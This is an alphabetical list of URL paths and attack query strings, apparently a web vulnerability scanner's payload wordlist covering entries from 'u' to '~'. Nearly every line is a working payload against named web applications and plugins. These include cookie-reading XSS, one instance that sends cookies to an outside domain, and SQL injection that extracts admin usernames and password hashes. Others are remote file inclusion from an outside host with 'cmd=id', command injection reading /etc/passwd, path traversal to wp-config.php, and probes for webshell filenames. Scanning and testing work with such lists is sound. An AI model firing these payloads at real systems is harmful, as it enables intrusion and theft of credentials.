url_placeholder/pvm_messagestore.php?msgid=&sender=&rcpt=&subject=&meta=&mailsize=&folder=allfolders&date1=<script>alert('xss')</script>&date2=&s=mails&favname=
url_placeholder/pvm_smtpstore.php?id=frozen&action=\x22><script>alert(\x22XSS\x22)</script>
url_placeholder/pvm_user_management.php?userfilter=1%22+onblur%3D%22alert%28%27xss%27%29
url_placeholder/sla/index.php?l=\x22><script>alert(document.cookie)</script>
url_placeholder/sys_tools.php?form=ping&page=sys_ping.php&ping=<script>alert(document.cookie)</script>
urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
urlinn_includes/config.php?dir_ws=http://www.yxlink.com/nvs_test.txt?
us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\x5Cboot.ini
usage/
user-properties.jsp?username=%3Cscript%3Ealert(%27xss%27)%3C/script%3E
user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,md5(333),0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23
user.php?caselist[bad_file.txt][path]=http://www.yxlink.com/nvs_test.txt&command=cat%20/etc/passwd
user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
user.php?op=userinfo&uname=<script>alert('hi');</script>
user.php?op=userinfo&uname=<script>alert(1111);</script>
user/list.php
user/reg/regajax.asp?action=getcityoption&province=%25
user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,%2527NVS_TEST%2527%252Busername%252B%2527NVS_TEST%2527%252Bpassword%252B%2527NVS_TEST%2527%2520from%2520KS_Admin%2500
user/storage_explore.php
user_language.php?INDM=r3d.w0rm&language_dir=http://www.yxlink.com/nvs_test.txt?
user_new_2.php?home=http://www.yxlink.com/nvs_test.txt
userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=%27
usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20@@servername=1;%20--
usercp.php/>\x22><ScRiPt>alert(213771818860)</ScRiPt>
usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
userpay.php?skinco=black\x22><script>alert(222);</script>
userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
usr/extensions/get_calendar.inc.php?root_path=http://www.yxlink.com/nvs_test.txt
usr/extensions/get_infochannel.inc.php?root_path=http://www.yxlink.com/nvs_test.txt?cmd=id;pwd
usr/extensions/get_tree.inc.php?GLOBALS[\x5C\x22root_path\x5C\x22]=http://www.yxlink.com/nvs_test.txt?cmd=id;pwd
usr/extensions/get_tree.inc.php?GLOBALS[root_path]=http://www.yxlink.com/nvs_test.txt
util/icon_browser.php?subdir=<body onload=\x22alert(222)\x22>&app=horde
utilitaires/gestion_sondage.php?repertoire_visiteur=http://www.yxlink.com/nvs_test.txt
utilitaires/gestion_sondage.php?repertoire_visiteur=http://www.yxlink.com/nvs_test.txt?&cmd=ls
utils/class_HTTPRetriever.php?libcurlemuinc=http://www.yxlink.com/nvs_test.txt
v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.yxlink.com/nvs_test.txt
v.php
vCard/admin/define.inc.php?match=http://www.yxlink.com/nvs_test.txt?&cmd=id
variables.php3?Include=http://www.yxlink.com/nvs_test.txt
vb/includes/functions.php?classfile=http://www.yxlink.com/nvs_test.txt
vb/includes/functions_cron.php?nextitem=http://www.yxlink.com/nvs_test.txt
vb/includes/functions_forumdisplay.php?specialtemplates=http://www.yxlink.com/nvs_test.txt
vb/vb.php?filename=http://www.yxlink.com/nvs_test.txt
vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,md5(333),salt,username,5,6,7,8,9,10,11,12,13+FROM+user-
vbgsitemap/vbgsitemap-config.php?base=http://www.yxlink.com/nvs_test.txt
vbgsitemap/vbgsitemap-vbseo.php?base=http://www.yxlink.com/nvs_test.txt
vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vc/vc/interface/index/que_scount.jsp?webid=1
vedit/editor/edit_htmlarea.php?highlighter=http://www.yxlink.com/nvs_test.txt?
viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=http://www.yxlink.com/nvs_test.txt?
view.php?ariadne=http://www.yxlink.com/nvs_test.txt?
view.php?id=http://www.yxlink.com/nvs_test.txt
view_func.php?i=http://www.yxlink.com/nvs_test.txt&l=testfile.txt?
view_user.php?list=1&letter=&sort_by='
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\x5C\x22><script>alert('Vulnerable')</script>;
viewforum.php?id=-1' UNION%20AL%20 SELECT 1,2,GROUP_CONCAT(CONCAT(md5(333), 0x3a, password)),4,5,6,7,8 FROM celer_users%23
viewpage.php?file=/etc/passwd
views/print/printbar.php?views_path=http://www.yxlink.com/nvs_test.txt
viewsource?/etc/passwd
viewthread.php?tid=<script>alert(1111/);</script>
viewtopic.php?t=1&highlight=%2527
viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
visible_count_inc.php?statitpath=http://www.yxlink.com/nvs_test.txt
visitor.php?_SERVER[DOCUMENT_ROOT]=http://www.yxlink.com/nvs_test.txt??
volume.php?config[public_dir]=http://www.yxlink.com/nvs_test.txt?
vote.php?Madoa=http://www.yxlink.com/nvs_test.txt?
vote.php?act=dovote&name[1/**/and/**/(select/**/1/**/from(select/**/count(*),concat(0x7c,(select/**/(Select/**/md5(888888888881))/**/from/**/information_schema.tables/**/limit/**/0,1),0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x/**/limit/**/0,1)a)%23][111]=aa
votebox.php?VoteBoxPath=http://www.yxlink.com/nvs_test.txt
vp/configure.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
vq/demos/respond.pl?<script>alert('Vulnerable')</script>
vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string=\x22><script>alert(1);</script>
vtigercrm/index.php?module=Products&action=index&parenttab=\x22><script>alert(1);</script>
vtigercrm/index.php?module=Users&action=Authenticate&user_password=\x22><script>alert(1);</script>
vuln-search.aspx?term=</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://www.yxlink.com/nvs_test.txt
w-agora_path/add_user.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w-agora_path/create_forum.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w-agora_path/create_user.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w-agora_path/delete_notes.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w-agora_path/delete_user.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w-agora_path/edit_forum.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w-agora_path/mail_users.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w-agora_path/moderate_notes.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w-agora_path/reorder_forums.php?bn_dir_default=http://www.yxlink.com/nvs_test.txt?
w.php
w3c/
wamp_dir/setup/yesno.phtml?no_url=http://www.yxlink.com/nvs_test.txt?
wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,md5(333333),27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20information_schema.tables;%23
wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,1,0x27,0x4E56535F54455354,2,0x27,0x7e)%20from%20information_schema.tables%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
wapchat/src/eng.adCreate.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.adCreateSave.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.createRoom.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.forward.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.pageLogout.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.resultMember.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.saveNewRoom.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.searchMember.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
wapchat/src/eng.writeMsg.php?sysFileDir=http://www.yxlink.com/nvs_test.txt
war.php?vwar_root=http://www.yxlink.com/nvs_test.txt
war.php?vwar_root=http://www.yxlink.com/nvs_test.txt?&cmd=ls
warn.php?file=http://www.yxlink.com/nvs_test.txt
was40/passwd/passwd.htm
was40/tree
watermark.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt
way-board.cgi?db=/etc/passwd%00
way-board/way-board.cgi?db=/etc/passwd%00
wbxml/WBXML/Decoder.php?base_dir=http://www.yxlink.com/nvs_test.txt
wbxml/WBXML/Encoder.php?base_dir=http://www.yxlink.com/nvs_test.txt
wcf/acp/dereferrer.php?url=javascript:alert(2222);
wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers
wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
wcm/services
web/
web/Administration/Includes/configureText.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/Administration/Includes/contentHome.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/Administration/Includes/deleteContent.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/Administration/Includes/deleteUser.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/Administration/Includes/userHome.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules//Module/Module.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_pathhttp://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/EditProfileModule/external.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefixhttp://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_pathhttp://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_pathhttp://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/MyNetworksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_pathhttp://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_pathhttp://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_pathhttp://www.yxlink.com/nvs_test.txt
web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/Flickrclient.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATHhttp://www.yxlink.com/nvs_test.txt?
web/help.php?LIBSDIR=http://www.yxlink.com/nvs_test.txt
web/includes/blogger.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/includes/functions/auto_email_notify.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/includes/functions/html_generate.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/includes/functions/validations.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/index.php?LIBSDIR=http://www.yxlink.com/nvs_test.txt
web/init_mysource.php?INCLUDE_PATH=http://www.yxlink.com/nvs_test.txt?
web/lib/xml/oai/ListRecords.php?xml_dir=http://www.yxlink.com/nvs_test.txt
web/login.php?LIBSDIR=http://www.yxlink.com/nvs_test.txt
web/logout.php?LIBSDIR=http://www.yxlink.com/nvs_test.txt
web/lom.php?ETCDIR=http://www.yxlink.com/nvs_test.txt
web/msgList/viewmsg/actions/msgAnalyse.asp?Queue=Network%20Security&FileName=[XSS]&IsolatedMessageID=[XSS]&ServerName=[XSS]&Dictionary=[XSS]&Scoring=[XSS]&MessagePart=\x22><script>alert(4444)</script>
web/network_module_selector.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/submit_abuse.php?path_prefix=http://www.yxlink.com/nvs_test.txt
web/submit_comment.php?path_prefix=http://www.yxlink.com/nvs_test.txt
webService/webServicesGeneral.jsf?');};alert(222);</script><!
webadmin.php
webadmin/
webalizer/
webamil/test.php
webamil/test.php?mode=phpinfo
webauthentication?GetPic?image=x%3Cimg%20src=%22A%22+onError=%22javascript:alert('Thanks%20for%20turning%20on%20the%20remotecontrol')%3b%22%3Exxx
webavis/class/class.php?root=http://www.yxlink.com/nvs_test.txt
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script>
webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
webcalendar/week.php?user=\x5C\x22><script>alert(document.cookie)</script>
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\x5C\x22Vulnerable\x5C\x22)</script>&email1=<script>alert%20(\x5C\x22Vulnerable\x5C\x22)</script>
webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert(document.cookie)</script>
webdav/index.html
webdbm?Event=DBM_LOGON&Action=VIEW&Server=&Database=\x22><script>alert(333)</script>
webdist.cgi?distloc=;cat%20/etc/passwd
webessence/webessence/oembed.php?url=http://google.com&id=<script>alert(222);</script>
weblogic
webmail/horde/test.php
webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://www.yxlink.com/nvs_test.txt
webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.yxlink.com/nvs_test.txt
webmediaexpl/htdocs/index.php?search=\x22onmouseover=alert(0)
webnews/template.php?content_page=http://www.yxlink.com/nvs_test.txt?
webplus.exe?about
webplus?about
webroot/css.php?CONFIGS=http://www.yxlink.com/nvs_test.txt
webshell.php
webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
webtop/wdk/
webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
webtop/wdk/samples/index.jsp
webyep-system/program/lib/WYURL.php?webyep_sIncludePath=http://www.yxlink.com/nvs_test.txt
webyep-system/programm/webyep.php?webyep_sIncludePath=http://www.yxlink.com/nvs_test.txt?
welcome.asp?id=%27
whatever.htr
whateverJUNK(4).html
where.pl?sd=ls%20/etc
whois.cgi?action=load&whois=%3Bid
whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
wiki/style/default/admin/open.gif 
wikihome/action/conflict.php?TemplateDir=http://www.yxlink.com/nvs_test.txt
window.php?action=http://www.yxlink.com/nvs_test.txt
wlse/configure/archive/archiveApplyDisplay.jsp?displayMsg=<script>document.location='http://baidu.com'+document.cookie</script>
wmi.php
wordpress/wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack<script>alert(String.fromCharCode(72,101,108,108,111,32,58,68,32))</script>
wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.yxlink.com/nvs_test.txt?
work/index.php?g_include=http://www.yxlink.com/nvs_test.txt
work/module/forum/forum.php?g_include=http://www.yxlink.com/nvs_test.txt
worldpay_notify.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
wp-app.log
wp-cache-phase1.php?plugin=http://www.yxlink.com/nvs_test.txt
wp-content/plugins/Calendar-Script/load-events.php?cid=1 union all select md5(333)
wp-content/plugins/akismet/readme.txt
wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=http://www.yxlink.com/nvs_test.txt
wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.yxlink.com/nvs_test.txt
wp-content/plugins/hello.php
wp-content/plugins/hitasoft_player/config.php?id=1%20union%20all%20select  %201,2,3,4,5,6,7,8,md5(333),10,11,12,13,14,15,16,17 from wp_users--
wp-content/plugins/madebymilk/voting-popup.php?id=null'
wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.yxlink.com/nvs_test.txt
wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yxlink.com/nvs_test.txt
wp-content/plugins/nextgen-gallery/xml/media-rss.php?mode=%3Cscript%3Ealert(1)%3C/script%3E
wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,md5(333),6,7,8--
wp-content/plugins/plugin-dir/timeline/index.php?id=-1%20union%20select%20md5(333),md5(333),md5(333),md5(333),md5(333)
wp-content/plugins/taggedalbums/image.php?id='
wp-content/plugins/tagninja/fb_get_profile.php?id=<script>alert(333)</script>
wp-content/plugins/webplayer/config.php?id=\xE2\x80\x99 union all select 1,2,3,md5(333)
wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.yxlink.com/nvs_test.txt
wp-content/plugins/wp-download.php?dl_id=null/**/union/**/all/**/select/**/md5(333)/*
wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://www.yxlink.com/nvs_test.txt
wp-content/plugins/wpeasystats/export.php?homep=http://www.yxlink.com/nvs_test.txt
wp-content/themes/dailyedition-mouss/fiche-disque.php?id=-78+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28user_login,md5(333)%29,14,15,16,17,18,19,20+from+wp_users--
wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg%3E.jpg
wp-content/themes/flashnews/thumb.php?src=http://www.yxlink.com/nvs_test.txt
wp-content/themes/kakao/sonHaberler.php?ID=-1+union+select+1,2,3,4,5,group_concat%28md5(333),0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wp_users--
wp-content/themes/magazine-basic/view_artist.php?id='
wp-links-opml.php
wrsky.php
ws/generic_api_call.pl?function=statns&amp;standalone=%3c/script%3e%3cscript%3ealert(1111)%3c/script%3e%3cscript%3e
wsk/wsk.php?wsk=http://www.yxlink.com/nvs_test.txt
wso_tmp.php
wstats/wstats.jsp
wt.php
www/admin/plugin-index.php?action=info&group=vastInlineBannerTypeHtml&parent=%22%3E%3Cscript%3Ealert%28111%29;%3C/script%3E
wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>
wwwwais
wx/s.dll?d=/boot.ini
x.php
x_stat_admin.php?action=phpinfo
xarg_corner.php?xarg=http://www.yxlink.com/nvs_test.txt?
xarg_corner_bottom.php?xarg=http://www.yxlink.com/nvs_test.txt?
xarg_corner_top.php?xarg=http://www.yxlink.com/nvs_test.txt?
xdk/
xiao.php
xiaoma.php
xinfo.php
xm.php
xml_zone_data.php?filter=1%20union%20select%20concat(0x0a,md5(333),0x3a,pass,0x3a,0x0a)%20from%20users
xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt&2093085906=1&995617320=2
xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.yxlink.com/nvs_test.txt?&2093085906=1&995617320=2
xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
xt_counter.php?server_base_dir=http://www.yxlink.com/nvs_test.txt
xx.php
xxgk/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1
y.php
yabbse/Sources/Packages.php?sourcedir=http://www.yxlink.com/nvs_test.txt
yacs/scripts/update_trailer.php?context[path_to_root]=http://www.yxlink.com/nvs_test.txt?
yijuhua.php
yjh.php
yp/job.php?action=list&station=1&genre=0%2527%20and%20(select%201%20from%20(select%20count(*),concat(md5(333),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
yp/product.php?pagesize=${@print(md5(NVS_TEST))}
yrch/plugins/metasearch/plug.inc.php?path=http://www.yxlink.com/nvs_test.txt
ytb/cuenta/cuerpo.php?base_archivo=http://www.yxlink.com/nvs_test.txt
ytb/mensaje.php?m=<script>alert(/xss/)</script>
ytb/todos.php?id=-99+union+select+1,2,md5(333),contrasena,5,6,7+from+ytb_usuarios+where+id=1/*
yyoa/ext/https/getSessionList.jsp?cmd=getAll
z.php
z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
zabbix/httpmon.php?applications=2%20and%20(select%201%20from%20(select%20count(*),concat(md5(333),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
zacosmall.php
zecmd/zecmd.jsp
zhidao/user.php?j=question&u=-1+union+select+1,2,3,md5(1234567890),5,6,7,8--
zipndownload.php?PP_PATH=http://www.yxlink.com/nvs_test.txt?
zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,88888888888-1,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,88888888888-1,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://www.yxlink.com/nvs_test.txt?
zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
~/<script>alert('Vulnerable')</script>.asp
